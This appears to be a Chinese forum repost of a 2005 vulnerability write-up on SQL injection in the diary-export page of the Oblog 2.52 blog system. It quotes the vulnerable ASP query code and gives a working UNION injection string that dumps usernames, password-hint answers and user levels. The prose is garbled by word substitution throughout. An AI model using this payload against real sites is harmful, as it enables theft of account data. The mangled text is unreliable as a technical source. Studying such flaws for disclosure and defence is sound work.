|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
asp对于服务器的要求较高,一般的服务器如果访问量一大就垮了,不得不重启。 Oblog 2.52导出日记最新破绽
/**
作者:慈勤强
Http://blog.csdn.net/cqq
2005-02-22
*/
昨天正好从oblog官方网站下载了一套最新的blog体系,版本是2.52的吧。
原本是在qq上看到一个伴侣会商help.asp文件的入侵思绪的,
那篇文章在这里可以找到,
http://blog.csdn.net/cqq/archive/2005/02/22/297316.aspx
以后,随手注册了一个用户,大体阅读了一下,
在后台有个导出日记的功效对照好,
如许就能够避免因为blog站点封闭,而本人辛辛劳苦写的文章没法保留的成绩了。
csdn的blog就没有导出日记的功效,为此我还特地写了个小法式,
请看这里:
http://blog.csdn.net/cqq/archive/2005/02/04/280545.aspx
不外,这个导出日记的asp文件存在sql injection破绽,
原本是导出本人的文章的,
如许一来,数据库里的任何数据都可以随意导出了,
直接伤害到全部blog体系的平安。
次要的SQL代码以下:
sdate=request("selecty")&"-"&request("selectm")&"-"&request("selectd")
edate=request("selectey")&"-"&request("selectem")&"-"&request("selected")
sql="select topic,addtime,logtext from blog where username='"&username&"' and addtime<=#"&edate&"# and
addtime>=#"&sdate&"#"
人人看到,一切的客户端数据都没有经由反省就直接利用了,
天然会有成绩,
由于不论甚么情形,客户真个数据都是不成等闲信任的。
那末,咱们机关如许的输出
"selectd=22# and 1=2 union select username,answer,userlevel from [user] union select topic,addtime,logtext from blog
where addtime<=#1900-1-1"
全部的sql语句就变成了:
select topic,addtime,logtext from blog where username='慈勤强' and addtime<=#2007-2-22# and addtime>=#2000-2-22# and
1=2
union select username,answer,userlevel from [user]
union select topic,addtime,logtext from blog where addtime<=#1900-1-1#
如许,就能够输入一切的用户名、用户暗码提醒成绩谜底和用户品级了
固然也能够失掉数据库中的任何内容了,只需恰当的变换sql语句。
</p> ASP由于使用了COM组件所以它会变的十分强大,但是这样的强大由于Windows NT系统最初的设计问题而会引发大量的安全问题。只要在这样的组件或是操作中一不注意,哪么外部攻击就可以取得相当高的权限而导致网站瘫痪或者数据丢失; |
|